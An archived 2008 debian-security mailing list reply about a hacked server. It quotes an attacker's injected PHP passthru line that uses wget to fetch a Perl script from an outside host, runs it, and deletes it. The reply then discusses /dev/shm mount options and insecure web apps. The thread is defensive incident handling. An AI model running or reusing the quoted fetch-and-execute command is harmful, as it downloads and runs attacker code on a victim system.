Re: ping22: can not kill this process

To: debian-security@lists.debian.org
Subject: Re: ping22: can not kill this process
From: Bernd Eckenfels <ecki@lina.inka.de>
Date: Fri, 04 Jan 2008 08:23:45 +0100
Message-id: <[🔎] E1JAgu9-0002kt-00@calista.eckenfels.net>
In-reply-to: <[🔎] 91dd90da0801031518o767a5937je92550695aa66f4f@mail.gmail.com>

In article <[🔎] 91dd90da0801031518o767a5937je92550695aa66f4f@mail.gmail.com> you wrote:
>       I found the issue, it is one of the php script allowing the
> remote script to run.

This is a typical Apache exploit where remote fileuploads are possible.

> passthru('cd /tmp;wget http://www.radiovirtual.org/bb.txt;perl
> bb.txt;rm -f bb.txt*');

>        what kind applications are using /dev/shm? I googled
> around,seem not find much information.
> right now I mount i as rw,noexec,nosuid.

It is for example used to map shared memory. I am not sure, but I think
noexec and nodev is possible. However this does not solve your problem of a
insecure web app.

Gruss
Bernd

Reply to:

Follow-Ups:
- Re: ping22: can not kill this process
  - From: Hubert Chathi <uhoreg@debian.org>

References:
- Re: ping22: can not kill this process
  - From: "Mike Wang" <comritesecurity@gmail.com>

Prev by Date: Re: ping22: can not kill this process
Next by Date: Re: ping22: can not kill this process
Previous by thread: Re: ping22: can not kill this process
Next by thread: Re: ping22: can not kill this process
Index(es):
- Date
- Thread